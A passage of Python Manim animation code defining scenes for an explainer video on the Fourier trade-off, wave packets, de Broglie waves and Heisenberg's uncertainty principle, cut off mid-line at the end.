self.play(\n RemovePiCreatureBubble(morty),\n PiCreatureSays(\n physy2,\n \"Take the Schrödinger equation \\\\\\\\ with $H = \\\\frac{p^2}{2m}+V(x)$\",\n bubble_config = {\"fill_opacity\" : 0.9},\n ),\n )\n self.play(\n PiCreatureSays(\n physy1,\n \"Even classically position and \\\\\\\\ momentum are conjugate\",\n target_mode = \"surprised\",\n bubble_config = {\"fill_opacity\" : 0.9},\n ),\n )\n self.play(\n PiCreatureSays(\n physy3,\n \"Consider special relativity \\\\\\\\ together with $E = hf$\",\n target_mode = \"hooray\",\n bubble_config = {\"fill_opacity\" : 0.9},\n ),\n morty.change, \"guilty\"\n )\n self.wait(2)\n\n\n\n ###\n\n def create_pi_creatures(self):\n scale_factor = 0.85\n morty = Mortimer().flip()\n morty.scale(scale_factor)\n morty.to_corner(DOWN+LEFT)\n\n physies = VGroup(*[\n PiCreature(color = c).flip()\n for c in (GREY, GREY_B, GREY_D)\n ])\n physies.arrange(RIGHT, buff = MED_SMALL_BUFF)\n physies.scale(scale_factor)\n physies.to_corner(DOWN+RIGHT)\n\n self.add(physies)\n return VGroup(morty, *physies)\n\nclass SortOfDopplerEffect(PiCreatureScene):\n CONFIG = {\n \"omega\" : np.pi,\n \"arrow_spacing\" : 0.25,\n }\n def setup(self):\n PiCreatureScene.setup(self)\n rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)\n rect.set_stroke(width = 0)\n self.camera = MovingCamera(\n rect, **self.camera_config\n )\n\n def construct(self):\n screen_rect = self.screen_rect\n\n #x-coordinate gives time\n t_tracker = VectorizedPoint()\n #x-coordinate gives wave number\n k_tracker = VectorizedPoint(2*RIGHT)\n always_shift(t_tracker, RIGHT, 1)\n def get_wave():\n t = t_tracker.get_center()[0]\n k = k_tracker.get_center()[0]\n omega = self.omega\n color = interpolate_color(\n BLUE, RED, (k-2)/2.0\n )\n func = lambda x : 0.5*np.cos(omega*t - k*x)\n graph = FunctionGraph(\n func,\n x_min = -5*FRAME_X_RADIUS,\n x_max = FRAME_X_RADIUS,\n color = color,\n )\n return VGroup(graph, *[\n Arrow(\n x*RIGHT, x*RIGHT + func(x)*UP, \n color = color\n )\n for x in np.arange(\n -4*FRAME_X_RADIUS, FRAME_X_RADIUS, \n self.arrow_spacing\n )\n ])\n return \n wave = get_wave()\n wave_update = Mobject.add_updater(\n wave, lambda w : Transform(w, get_wave()).update(1)\n )\n\n rect = ScreenRectangle(height = 2)\n rect.to_edge(RIGHT)\n always_shift(rect, LEFT, 1)\n rect_movement = rect\n\n randy = self.pi_creature\n randy_look_at = Mobject.add_updater(\n randy, lambda r : r.look_at(rect)\n )\n\n ref_frame1 = OldTexText(\"Reference frame 1\")\n # ref_frame1.next_to(randy, UP, aligned_edge = LEFT)\n ref_frame1.to_edge(UP)\n ref_frame2 = OldTexText(\"Reference frame 2\")\n ref_frame2.next_to(rect, UP)\n # ref_frame2.set_fill(opacity = 0)\n ref_frame2_follow = Mobject.add_updater(\n ref_frame2, lambda m : m.next_to(rect, UP)\n )\n ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)\n\n self.add(\n t_tracker, wave_update, rect_movement, randy_look_at,\n ref_frame2_follow, ref_frame_1_continual_anim\n )\n self.add(ref_frame1)\n self.play(randy.change, \"pondering\")\n self.wait(4)\n start_height = screen_rect.get_height()\n start_center = screen_rect.get_center()\n self.play(\n UpdateFromAlphaFunc(\n screen_rect,\n lambda m, a : m.move_to(\n interpolate(start_center, rect.get_center(), a)\n )\n ),\n k_tracker.shift, 2*RIGHT,\n )\n self.play(\n MaintainPositionRelativeTo(\n screen_rect, rect,\n run_time = 4\n ),\n )\n self.play(\n screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,\n k_tracker.shift, 2*LEFT,\n )\n\n #Frequency words\n temporal_frequency = OldTexText(\"Temporal\", \"frequency\")\n spatial_frequency = OldTexText(\"Spatial\", \"frequency\")\n temporal_frequency.move_to(screen_rect).to_edge(UP)\n spatial_frequency.next_to(temporal_frequency, DOWN)\n cross = Cross(temporal_frequency[0])\n\n time = OldTexText(\"Time\")\n space = OldTexText(\"Space\")\n time.next_to(temporal_frequency, RIGHT, buff = 2)\n space.next_to(time, DOWN)\n space.align_to(spatial_frequency)\n\n self.play(FadeIn(temporal_frequency))\n self.play(ShowCreation(cross))\n self.play(Write(spatial_frequency))\n self.wait()\n self.play(FadeIn(time), FadeIn(space))\n self.play(\n Transform(time, space),\n Transform(space, time),\n lag_ratio = 0.5,\n run_time = 1,\n )\n self.play(FadeOut(time), FadeOut(space))\n self.wait(3)\n\n ###\n\n def create_pi_creature(self):\n return Randolph().scale(0.5).to_corner(DOWN+LEFT)\n\nclass HangingWeightsScene(MovingCameraScene):\n CONFIG = {\n \"frequency\" : 0.5,\n \"ceiling_radius\" : 3*FRAME_X_RADIUS,\n \"n_springs\" : 72,\n \"amplitude\" : 0.6,\n \"spring_radius\" : 0.15,\n }\n def construct(self):\n self.setup_springs()\n self.setup_weights()\n self.introduce()\n self.show_analogy_with_electron()\n self.metaphor_for_something()\n self.moving_reference_frame()\n\n def setup_springs(self):\n ceiling = self.ceiling = Line(LEFT, RIGHT)\n ceiling.scale(self.ceiling_radius)\n ceiling.to_edge(UP, buff = LARGE_BUFF)\n self.add(ceiling)\n\n def get_spring(alpha, height = 2):\n t_max = 6.5\n r = self.spring_radius\n s = (height - r)/(t_max**2)\n spring = ParametricCurve(\n lambda t : op.add(\n r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),\n s*((t_max - t)**2)*DOWN,\n ),\n t_min = 0, t_max = t_max,\n color = WHITE,\n stroke_width = 2,\n )\n spring.alpha = alpha\n spring.move_to(ceiling.point_from_proportion(alpha), UP)\n spring.color_using_background_image(\"grey_gradient\")\n return spring\n alphas = np.linspace(0, 1, self.n_springs)\n bezier([0, 1, 0, 1])\n springs = self.springs = VGroup(*list(map(get_spring, alphas)))\n\n k_tracker = self.k_tracker = VectorizedPoint()\n t_tracker = self.t_tracker = VectorizedPoint()\n always_shift(t_tracker, RIGHT, 1)\n self.t_tracker_walk = t_tracker\n equilibrium_height = springs.get_height()\n def update_springs(springs):\n for spring in springs:\n k = k_tracker.get_center()[0]\n t = t_tracker.get_center()[0]\n f = self.frequency\n x = spring.get_top()[0]\n A = self.amplitude\n d_height = A*np.cos(TAU*f*t - k*x)\n new_spring = get_spring(spring.alpha, 2+d_height)\n Transform(spring, new_spring).update(1)\n spring_update_anim = Mobject.add_updater(springs, update_springs)\n self.spring_update_anim = spring_update_anim\n spring_update_anim.update(0)\n\n self.play(\n ShowCreation(ceiling),\n LaggedStartMap(ShowCreation, springs)\n )\n\n def setup_weights(self):\n weights = self.weights = VGroup()\n weight_anims = weight_anims = []\n for spring in self.springs:\n x = spring.get_top()[0]\n mass = np.exp(-0.1*x**2)\n weight = Circle(radius = 0.15)\n weight.start_radius = 0.15\n weight.target_radius = 0.25*mass #For future update\n weight.spring = spring\n weight_anim = Mobject.add_updater(\n weight, lambda w : w.move_to(w.spring.get_bottom())\n )\n weight_anim.update(0)\n weight_anims.append(weight_anim)\n weights.add(weight)\n weights.set_fill(opacity = 1)\n weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)\n weights.set_stroke(WHITE, 1)\n\n self.play(LaggedStartMap(GrowFromCenter, weights))\n self.add(self.t_tracker_walk)\n self.add(self.spring_update_anim)\n self.add(*weight_anims)\n\n def introduce(self):\n arrow = Arrow(4*LEFT, LEFT)\n arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))\n arrows.set_color(WHITE)\n\n self.wait(3)\n self.play(*list(map(GrowArrow, arrows)))\n self.play(*[\n UpdateFromAlphaFunc(\n weight, lambda w, a : w.set_width(\n 2*interpolate(w.start_radius, w.target_radius, a)\n ),\n run_time = 2\n )\n for weight in self.weights\n ])\n self.play(FadeOut(arrows))\n self.wait(3)\n\n def show_analogy_with_electron(self):\n words = OldTexText(\n \"Analogous to the energy of a particle \\\\\\\\\",\n \"(in the sense of $E=mc^2$)\"\n )\n words.move_to(DOWN)\n\n self.play(Write(words))\n self.wait(3)\n self.play(FadeOut(words))\n\n def metaphor_for_something(self):\n de_broglie = ImageMobject(\"de_Broglie\")\n de_broglie.set_height(3.5)\n de_broglie.to_corner(DOWN+RIGHT)\n words = OldTexText(\"\"\"\n If a photon's energy is carried as a wave \\\\\\\\\n is this true for any particle?\n \"\"\")\n words.next_to(de_broglie, LEFT)\n\n einstein = ImageMobject(\"Einstein\")\n einstein.match_height(de_broglie)\n einstein.to_corner(DOWN+LEFT)\n\n for picture in de_broglie, einstein:\n picture.backdrop = Rectangle()\n picture.backdrop.replace(picture, stretch = True)\n picture.backdrop.set_fill(BLACK, 1)\n picture.backdrop.set_stroke(BLACK, 0)\n\n self.play(\n Animation(de_broglie.backdrop, remover = True),\n FadeIn(de_broglie)\n )\n self.play(Write(words))\n self.wait(7)\n self.play(\n FadeOut(words),\n Animation(einstein.backdrop, remover = True),\n FadeIn(einstein)\n )\n self.wait(2)\n\n self.de_broglie = de_broglie\n self.einstein = einstein\n\n def moving_reference_frame(self):\n rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)\n rect_movement = always_shift(rect, direction = LEFT, rate = 2)\n camera_frame = self.camera_frame\n\n self.add(rect)\n self.play( \n Animation(self.de_broglie.backdrop, remover = True),\n FadeOut(self.de_broglie),\n Animation(self.einstein.backdrop, remover = True),\n FadeOut(self.einstein),\n )\n self.play(camera_frame.scale, 3, {\"about_point\" : 2*UP})\n self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)\n self.add(rect_movement)\n self.wait(3)\n\n def zoom_into_reference_frame():\n original_height = camera_frame.get_height()\n original_center = camera_frame.get_center()\n self.play(\n UpdateFromAlphaFunc(\n camera_frame, lambda c, a : c.set_height(\n interpolate(original_height, 0.95*rect.get_height(), a)\n ).move_to(\n interpolate(original_center, rect.get_center(), a)\n )\n ),\n ApplyMethod(self.k_tracker.shift, RIGHT)\n )\n self.play(MaintainPositionRelativeTo(\n camera_frame, rect,\n run_time = 6\n ))\n self.play(\n camera_frame.set_height, original_height,\n camera_frame.move_to, original_center,\n ApplyMethod(self.k_tracker.shift, LEFT)\n )\n\n zoom_into_reference_frame()\n self.wait()\n self.play(\n UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))\n )\n\n index = int(0.5*len(self.springs))\n weights = VGroup(self.weights[index], self.weights[index+4])\n flashes = list(map(self.get_peak_flash_anim, weights))\n weights.save_state()\n weights.set_fill(RED)\n self.add(*flashes)\n self.wait(5)\n\n rect.align_to(camera_frame, RIGHT)\n self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))\n\n randy = Randolph(mode = \"pondering\")\n randy.look(UP+RIGHT)\n de_broglie = ImageMobject(\"de_Broglie\")\n de_broglie.set_height(6)\n de_broglie.next_to(4*DOWN, DOWN)\n self.add(\n Mobject.add_updater(\n randy, lambda m : m.next_to(\n rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,\n ).look_at(weights)\n ),\n de_broglie\n )\n self.wait(2)\n\n zoom_into_reference_frame()\n self.wait(8)\n\n ###\n\n def get_peak_flash_anim(self, weight):\n mobject = Mobject() #Dummy\n mobject.last_y = 0\n mobject.last_dy = 0\n mobject.curr_anim = None\n mobject.curr_anim_time = 0\n mobject.time_since_last_flash = 0\n def update(mob, dt):\n mob.time_since_last_flash += dt\n point = weight.get_center()\n y = point[1]\n mob.dy = y - mob.last_y\n different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)\n if different_dy and mob.time_since_last_flash > 0.5:\n mob.curr_anim = Flash(\n VectorizedPoint(point),\n flash_radius = 0.5,\n line_length = 0.3,\n run_time = 0.2,\n )\n mob.submobjects = [mob.curr_anim.mobject]\n mob.time_since_last_flash = 0\n mob.last_y = float(y)\n mob.last_dy = float(mob.dy)\n ##\n if mob.curr_anim:\n mob.curr_anim_time += dt\n if mob.curr_anim_time > mob.curr_anim.run_time:\n mob.curr_anim = None\n mob.submobjects = []\n mob.curr_anim_time = 0\n return\n mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)\n\n return Mobject.add_updater(mobject, update)\n\nclass MinutPhysicsWrapper(Scene):\n def construct(self):\n logo = ImageMobject(\"minute_physics_logo\", invert = True)\n logo.to_corner(UP+LEFT)\n self.add(logo)\n\n title = OldTexText(\"Minute Physics on special relativity\")\n title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)\n\n screen_rect = ScreenRectangle()\n screen_rect.set_width(title.get_width() + LARGE_BUFF)\n screen_rect.next_to(title, DOWN)\n\n self.play(ShowCreation(screen_rect))\n self.play(Write(title))\n self.wait(2)\n\nclass WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):\n def construct(self):\n self.teacher_says(\n \"So! What does \\\\\\\\ the Fourier trade-off \\\\\\\\ tell us?\",\n target_mode = \"surprised\",\n bubble_config = {\"width\" : 4, \"height\" : 3}\n )\n self.play_student_changes(*[\"thinking\"]*3)\n self.wait(4)\n\nclass FourierTransformOfWaveFunction(Scene):\n CONFIG = {\n \"wave_stroke_width\" : 3,\n \"wave_color\" : BLUE,\n }\n def construct(self):\n self.show_wave_packet()\n self.take_fourier_transform()\n self.show_correlations_with_pure_frequencies()\n self.this_is_momentum()\n self.show_tradeoff()\n\n def setup(self):\n self.x0_tracker = ValueTracker(-3)\n self.k_tracker = ValueTracker(1)\n self.a_tracker = ExponentialValueTracker(0.5)\n\n def show_wave_packet(self):\n axes = Axes(\n x_min = 0, x_max = 12,\n y_min = -1, y_max = 1,\n y_axis_config = {\n \"tick_frequency\" : 0.5\n }\n )\n position_label = OldTexText(\"Position\")\n position_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(position_label)\n axes.center().to_edge(UP, buff = LARGE_BUFF)\n\n wave = self.get_wave(axes)\n wave_update_animation = UpdateFromFunc(\n wave, lambda w : Transform(w, self.get_wave(axes)).update(1)\n )\n\n self.add(axes, wave)\n self.play(\n self.x0_tracker.set_value, 5,\n wave_update_animation,\n run_time = 3,\n )\n self.wait()\n\n self.wave_function = wave.underlying_function\n self.wave_update_animation = wave_update_animation\n self.wave = wave\n self.axes = axes\n\n def take_fourier_transform(self):\n wave = self.wave\n wave_update_animation = self.wave_update_animation\n frequency_axes = Axes(\n x_min = 0, x_max = 3,\n x_axis_config = {\n \"unit_size\" : 4,\n \"tick_frequency\" : 0.25,\n \"numbers_with_elongated_ticks\" : [1, 2]\n },\n y_min = -0.15,\n y_max = 0.15,\n y_axis_config = {\n \"unit_size\" : 7.5,\n \"tick_frequency\" : 0.05,\n }\n )\n label = self.frequency_x_axis_label = OldTexText(\"Spatial frequency\")\n label.next_to(frequency_axes.x_axis.get_right(), UP)\n frequency_axes.add(label)\n frequency_axes.move_to(self.axes, LEFT)\n frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)\n label.shift_onto_screen()\n\n def get_wave_function_fourier_graph():\n return get_fourier_graph(\n frequency_axes, self.get_wave_func(),\n t_min = 0, t_max = 15,\n )\n fourier_graph = get_wave_function_fourier_graph()\n self.fourier_graph_update_animation = UpdateFromFunc(\n fourier_graph, lambda m : Transform(\n m, get_wave_function_fourier_graph()\n ).update(1)\n )\n\n wave_copy = wave.copy()\n wave_copy.generate_target()\n wave_copy.target.move_to(fourier_graph, LEFT)\n wave_copy.target.fade(1)\n fourier_graph.save_state()\n fourier_graph.move_to(wave, LEFT)\n fourier_graph.fade(1)\n\n arrow = Arrow(\n self.axes.coords_to_point(5, -1),\n frequency_axes.coords_to_point(1, 0.1),\n color = YELLOW,\n )\n fourier_label = OldTexText(\"Fourier Transform\")\n fourier_label.next_to(arrow.get_center(), RIGHT)\n\n self.play(ReplacementTransform(\n self.axes.copy(), frequency_axes\n ))\n self.play(\n MoveToTarget(wave_copy, remover = True),\n fourier_graph.restore,\n GrowArrow(arrow),\n Write(fourier_label, run_time = 1),\n )\n self.wait()\n\n self.frequency_axes = frequency_axes\n self.fourier_graph = fourier_graph\n self.fourier_label = VGroup(arrow, fourier_label)\n\n def show_correlations_with_pure_frequencies(self):\n frequency_axes = self.frequency_axes\n axes = self.axes\n\n sinusoid = axes.get_graph(\n lambda x : 0.5*np.cos(TAU*x),\n x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,\n )\n sinusoid.to_edge(UP, buff = SMALL_BUFF)\n\n v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)\n v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)\n\n f_equals = OldTex(\"f = \")\n freq_decimal = DecimalNumber(1)\n freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)\n freq_label = VGroup(f_equals, freq_decimal)\n freq_label.next_to(\n v_line, UP, SMALL_BUFF, \n submobject_to_align = f_equals[0]\n )\n\n self.play(\n ShowCreation(sinusoid),\n ShowCreation(v_line),\n Write(freq_label, run_time = 1),\n FadeOut(self.fourier_label)\n )\n last_f = 1\n for f in 1.4, 0.7, 1:\n self.play(\n sinusoid.stretch,f/last_f, 0, \n {\"about_point\" : axes.coords_to_point(0, 0)},\n v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,\n MaintainPositionRelativeTo(freq_label, v_line),\n ChangeDecimalToValue(freq_decimal, f),\n run_time = 3,\n )\n last_f = f\n self.play(*list(map(FadeOut, [\n sinusoid, v_line, freq_label\n ])))\n\n def this_is_momentum(self):\n formula = OldTex(\"p\", \"=\", \"h\", \"\\\\xi\")\n formula.set_color_by_tex_to_color_map({\n \"p\" : BLUE,\n \"xi\" : YELLOW,\n })\n formula.next_to(\n self.frequency_x_axis_label, UP\n )\n\n f_max = 0.12\n brace = Brace(Line(2*LEFT, 2*RIGHT), UP)\n brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)\n words = OldTexText(\"This wave \\\\\\\\ describes momentum\")\n words.next_to(brace, UP)\n\n self.play(Write(formula))\n self.wait()\n self.play(\n GrowFromCenter(brace),\n Write(words)\n )\n brace.add(words)\n for k in 2, 0.5, 1:\n self.play(\n self.k_tracker.set_value, k,\n self.wave_update_animation,\n self.fourier_graph_update_animation,\n UpdateFromFunc(\n brace, lambda b : b.move_to(\n self.frequency_axes.coords_to_point(\n self.k_tracker.get_value(),\n f_max,\n ),\n DOWN\n )\n ),\n run_time = 2\n )\n self.wait()\n self.play(*list(map(FadeOut, [brace, words, formula])))\n\n def show_tradeoff(self):\n for a in 5, 0.1, 0.01, 10, 0.5:\n self.play(\n ApplyMethod(\n self.a_tracker.set_value, a,\n run_time = 2\n ),\n self.wave_update_animation,\n self.fourier_graph_update_animation\n )\n self.wait()\n\n ##\n\n def get_wave_func(self):\n x0 = self.x0_tracker.get_value()\n k = self.k_tracker.get_value()\n a = self.a_tracker.get_value()\n A = a**(0.25)\n return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)\n\n def get_wave(self, axes):\n return axes.get_graph(\n self.get_wave_func(), \n color = self.wave_color,\n stroke_width = self.wave_stroke_width\n )\n\nclass DopplerComparisonTodos(TODOStub):\n CONFIG = {\n \"message\" : \"\"\"\n Insert some Doppler footage, \n insert some hanging spring scene,\n insert position-momentum Fourier trade-off\n \"\"\"\n }\n\nclass MusicalNote(AddingPureFrequencies):\n def construct(self):\n speaker = self.speaker = SVGMobject(file_name = \"speaker\")\n speaker.move_to(2*DOWN)\n randy = self.pi_creature\n\n axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -1.5, y_max = 1.5\n )\n axes.center().to_edge(UP)\n time_label = OldTexText(\"Time\")\n time_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(time_label)\n\n graph = axes.get_graph(\n lambda x : op.mul(\n np.exp(-0.2*(x-4)**2),\n 0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),\n ),\n )\n graph.set_color(BLUE)\n v_line = DashedLine(ORIGIN, 0.5*UP)\n v_line_update = UpdateFromFunc(\n v_line, lambda l : l.put_start_and_end_on_with_projection(\n graph.get_points()[-1],\n axes.x_axis.number_to_point(\n axes.x_axis.point_to_number(graph.get_points()[-1])\n )\n )\n )\n\n self.add(speaker, axes)\n self.play(\n randy.change, \"pondering\",\n self.get_broadcast_animation(n_circles = 6, run_time = 5),\n self.get_broadcast_animation(n_circles = 12, run_time = 5),\n ShowCreation(graph, run_time = 5, rate_func=linear),\n v_line_update\n )\n self.wait(2)\n\nclass AskAboutUncertainty(TeacherStudentsScene):\n def construct(self):\n self.student_says(\n \"What does this have \\\\\\\\ to do with ``certainty''\",\n bubble_config = {\"direction\" : LEFT},\n index = 2\n )\n self.play(PiCreatureSays(\n self.students[0], \n \"What even are \\\\\\\\ these waves?\",\n target_mode = \"confused\"\n ))\n self.wait(2)\n\nclass ProbabalisticDetection(FourierTransformOfWaveFunction):\n CONFIG = {\n \"wave_stroke_width\" : 2,\n }\n def construct(self):\n self.setup_wave()\n self.detect_only_single_points()\n self.show_probability_distribution()\n self.show_concentration_of_the_wave()\n\n def setup_wave(self):\n axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -0.5, y_max = 1.5,\n y_axis_config = {\n \"unit_size\" : 1.5,\n \"tick_frequency\" : 0.25,\n }\n )\n axes.set_stroke(width = 2)\n axes.center()\n self.x0_tracker.set_value(5)\n self.k_tracker.set_value(1)\n self.a_tracker.set_value(0.2)\n wave = self.get_wave(axes)\n self.wave_update_animation = UpdateFromFunc(\n wave, lambda w : Transform(w, self.get_wave(axes)).update(1)\n )\n\n self.k_tracker.save_state()\n self.k_tracker.set_value(0)\n bell_curve = self.get_wave(axes)\n self.k_tracker.restore()\n bell_curve.set_stroke(width = 0)\n bell_curve.set_fill(BLUE, opacity = 0.5)\n squared_bell_curve = axes.get_graph(\n lambda x : bell_curve.underlying_function(x)**2\n ).match_style(bell_curve)\n\n self.set_variables_as_attrs(\n axes, wave, bell_curve, squared_bell_curve\n )\n\n def detect_only_single_points(self):\n particle = ProbabalisticDotCloud(\n n_copies = 100, \n fill_opacity = 0.05, \n time_per_change = 0.05,\n )\n particle.mobject[0].set_fill(BLUE, opacity = 1)\n gdw = particle.gaussian_distribution_wrapper\n\n rect = Rectangle(\n stroke_width = 0,\n height = 0.5,\n width = 2,\n )\n rect.set_fill(YELLOW, 0.3)\n rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))\n brace = Brace(rect, UP, buff = 0)\n question = OldTexText(\"Do we detect the particle \\\\\\\\ in this region?\")\n question.next_to(brace, UP)\n question.add_background_rectangle()\n rect.save_state()\n rect.stretch(0, 0)\n\n gdw_anim = Mobject.add_updater(\n gdw, lambda m : m.set_width(\n 2.0/(self.a_tracker.get_value()**(0.5))\n ).move_to(rect)\n )\n\n self.add(rect, brace, question)\n\n yes = OldTexText(\"Yes\").set_color(GREEN)\n no = OldTexText(\"No\").set_color(RED)\n for word in yes, no:\n word.next_to(rect, DOWN)\n # word.add_background_rectangle()\n answer = VGroup()\n def update_answer(answer):\n px = particle.mobject[0].get_center()[0]\n lx = rect.get_left()[0]\n rx = rect.get_right()[0]\n if lx < px < rx:\n answer.submobjects = [yes]\n else:\n answer.submobjects = [no]\n answer_anim = Mobject.add_updater(answer, update_answer)\n\n self.add(gdw_anim, particle)\n self.play(\n GrowFromCenter(brace),\n rect.restore,\n Write(question)\n )\n self.wait()\n self.add(answer_anim)\n self.wait(4)\n self.add_foreground_mobjects(answer, particle.mobject)\n\n self.question_group = VGroup(question, brace)\n self.particle = particle\n self.rect = rect\n\n def show_probability_distribution(self):\n axes = self.axes\n wave = self.wave\n bell_curve = self.bell_curve\n question_group = self.question_group\n gdw = self.particle.gaussian_distribution_wrapper\n rect = self.rect\n\n v_lines = VGroup(*[\n DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)\n for point in (rect.get_left(), rect.get_right())\n ])\n \n self.play(\n FadeIn(VGroup(axes, wave)),\n question_group.next_to, v_lines, UP, {\"buff\" : 0},\n *list(map(ShowCreation, v_lines))\n )\n self.wait(10)\n\n def show_concentration_of_the_wave(self):\n self.play(\n self.a_tracker.set_value, 5,\n self.wave_update_animation,\n )\n self.wait(10)\n\nclass HeisenbergCommentTodos(TODOStub):\n CONFIG = {\n \"message\" : \"Insert position-momentum trade-off\"\n }\n\nclass HeisenbergPetPeeve(PiCreatureScene):\n def construct(self):\n morty, other = self.pi_creatures\n particle = ProbabalisticDotCloud()\n gdw = particle.gaussian_distribution_wrapper\n gdw.to_edge(UP, buff = LARGE_BUFF)\n gdw.stretch_to_fit_width(3)\n gdw.rotate(3*DEGREES)\n\n self.add(particle)\n self.wait()\n self.play(PiCreatureSays(\n other, \"\"\"\n According to the H.U.P., the \\\\\\\\\n universe is unknowable!\n \"\"\",\n target_mode = \"speaking\"\n ))\n self.play(morty.change, \"angry\")\n self.wait(3)\n self.play(\n PiCreatureSays(\n morty, \"Well, yes and no\",\n target_mode = \"sassy\",\n ),\n RemovePiCreatureBubble(\n other, target_mode = \"erm\"\n )\n )\n self.wait(4)\n\n ###\n def create_pi_creatures(self):\n morty = Mortimer()\n morty.to_corner(DOWN+RIGHT)\n other = PiCreature(color = MAROON_E)\n other.to_edge(DOWN).shift(3*LEFT)\n return VGroup(morty, other)\n\nclass OneLevelDeeper(Scene):\n def construct(self):\n heisenberg = ImageMobject(\"Heisenberg\")\n heisenberg.to_corner(UP+LEFT)\n self.add(heisenberg)\n\n hup_words = OldTexText(\"Heisenberg's uncertainty principle\")\n wave_words = OldTexText(\"Interpretation of the wave function\")\n arrow = Vector(UP)\n group = VGroup(hup_words, arrow, wave_words)\n group.arrange(DOWN)\n\n randomness = ProbabalisticMobjectCloud(\n OldTexText(\"Randomness\"),\n n_copies = 5,\n time_per_change = 0.05\n )\n gdw = randomness.gaussian_distribution_wrapper\n gdw.rotate(TAU/4)\n gdw.set_height(1)\n # gdw.set_width(4)\n gdw.next_to(hup_words, UP, MED_LARGE_BUFF)\n\n self.add(hup_words, randomness)\n self.wait(4)\n self.play(\n FadeIn(wave_words),\n GrowArrow(arrow),\n ApplyMethod(\n gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,\n path_arc = TAU/2,\n )\n )\n self.wait(6)\n\nclass BetterTranslation(TeacherStudentsScene):\n def construct(self):\n english_term = OldTexText(\"Uncertainty principle\")\n german_word = OldTexText(\"Unschärferelation\")\n translation = OldTexText(\"Unsharpness relation\")\n\n to_german_words = OldTexText(\"In German\")\n to_german_words.scale(0.5)\n to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)\n to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)\n to_german_words.set_color(YELLOW)\n to_german_group = VGroup(to_german_arrow, to_german_words)\n\n translation_words = OldTexText(\"Literal translation\")\n translation_words.scale(0.5)\n translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)\n translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)\n translation_words.set_color(YELLOW)\n translation_group = VGroup(translation_arrow, translation_words)\n\n english_term.next_to(self.teacher, UP+LEFT)\n english_term.save_state()\n english_term.shift(DOWN)\n english_term.fade(1)\n self.play(\n english_term.restore,\n self.change_students(*[\"pondering\"]*3)\n )\n self.wait()\n\n german_word.move_to(english_term)\n to_german_group.next_to(\n german_word, UP,\n submobject_to_align = to_german_arrow\n )\n self.play(\n self.teacher.change, \"raise_right_hand\", \n english_term.next_to, to_german_arrow, UP\n )\n self.play(\n GrowArrow(to_german_arrow),\n FadeIn(to_german_words),\n ReplacementTransform(\n english_term.copy().fade(1),\n german_word\n )\n )\n self.wait(2)\n\n group = VGroup(english_term, to_german_group, german_word)\n translation.move_to(german_word)\n translation_group.next_to(\n german_word, UP,\n submobject_to_align = translation_arrow\n )\n self.play(\n group.next_to, translation_arrow, UP,\n )\n self.play(\n GrowArrow(translation_arrow),\n FadeIn(translation_words),\n ReplacementTransform(\n german_word.copy().fade(1),\n translation\n )\n )\n self.play_student_changes(*[\"happy\"]*3)\n self.wait(2)\n\nclass ThinkOfHeisenbergUncertainty(PiCreatureScene):\n def construct(self):\n morty = self.pi_creature\n morty.center().to_edge(DOWN).shift(LEFT)\n\n dot_cloud = ProbabalisticDotCloud()\n dot_gdw = dot_cloud.gaussian_distribution_wrapper\n dot_gdw.set_width(1)\n dot_gdw.rotate(TAU/8)\n dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2),\n\n vector_cloud = ProbabalisticVectorCloud(\n center_func = dot_gdw.get_center\n )\n vector_gdw = vector_cloud.gaussian_distribution_wrapper\n vector_gdw.set_width(0.1)\n vector_gdw.rotate(TAU/8)\n vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)\n\n time_tracker = ValueTracker(0)\n self.add()\n freq = 1\n continual_anims = [\n always_shift(time_tracker, direction = RIGHT, rate = 1),\n Mobject.add_updater(\n dot_gdw,\n lambda d : d.set_width(\n (np.cos(freq*time_tracker.get_value()) + 1.1)/2\n )\n ),\n Mobject.add_updater(\n vector_gdw,\n lambda d : d.set_width(\n (-np.cos(freq*time_tracker.get_value()) + 1.1)/2\n )\n ),\n dot_cloud, vector_cloud\n ]\n self.add(*continual_anims)\n\n position, momentum, time, frequency = list(map(TexText, [\n \"Position\", \"Momentum\", \"Time\", \"Frequency\"\n ]))\n VGroup(position, time).set_color(BLUE)\n VGroup(momentum, frequency).set_color(YELLOW)\n groups = VGroup()\n for m1, m2 in (position, momentum), (time, frequency):\n arrow = OldTex(\"\\\\updownarrow\").scale(1.5)\n group = VGroup(m1, arrow, m2)\n group.arrange(DOWN)\n lp, rp = parens = 